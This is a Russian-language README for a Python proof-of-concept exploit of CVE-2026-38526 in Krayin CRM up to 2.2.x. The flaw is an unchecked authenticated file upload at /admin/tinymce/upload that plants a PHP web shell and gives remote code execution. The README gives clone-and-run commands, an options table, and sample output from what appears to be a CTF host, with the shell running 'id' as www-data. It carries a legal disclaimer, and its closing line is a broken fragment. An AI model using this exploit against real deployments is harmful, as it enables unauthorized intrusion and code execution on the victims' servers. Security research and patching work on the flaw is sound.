
Python PoC, эксплуатирующий CVE-2026-38526 в Krayin CRM <= 2.2.x: загрузка аутентифицированного PHP-вебшелла через /admin/tinymce/upload, приводящая к удалённому выполнению кода.
⚠️ Правовая оговорка: этот код предоставлен исключительно в образовательных целях и для авторизованного тестирования (CTF, bug bounty, частная лаборатория). Автор не несёт ответственности за незаконное использование.
Krayin CRM (Webkul) ≤ 2.2.x предоставляет endpoint /admin/tinymce/upload,
который позволяет аутентифицированному пользователю (даже с низкими привилегиями)
загружать файлы без проверки расширения. Затем файл отдаётся
из папки storage/, что позволяет выполнить
произвольный код PHP.
git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt
python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'
Опции:
| Опция | Описание |
|---|---|
-t, --target | Корневой URL цели |
-u, --user | Email учётной записи Krayin |
-p, --password | Пароль |
-c, --command | Команда для выполнения (по умолчанию: id) |
--login-path | Путь для входа (по умолчанию: /admin/login) |
--upload-path | Путь для загрузки (по умолчанию: /admin/tinymce/upload) |
--timeout | HTTP-таймаут (по умолчанию: 15) |
$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
-u [email protected] -p 'N27xh!!2ucY04' -c 'id'
[*] Récupération du token CSRF sur http://billing.nexus.htb/admin/login
[*] Envoi du formulaire de login
[+] Authentification réussie
[*] Upload de x8f2k1ab.php via http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell accessible : http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Exécution : id
============================================================
[+] Commande : id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
storage/ и uploads/.Этот проект опубликован в целях исследования безопасности. Любое использование против систем без предварительного письменного разрешения является незаконным и строго запрещено.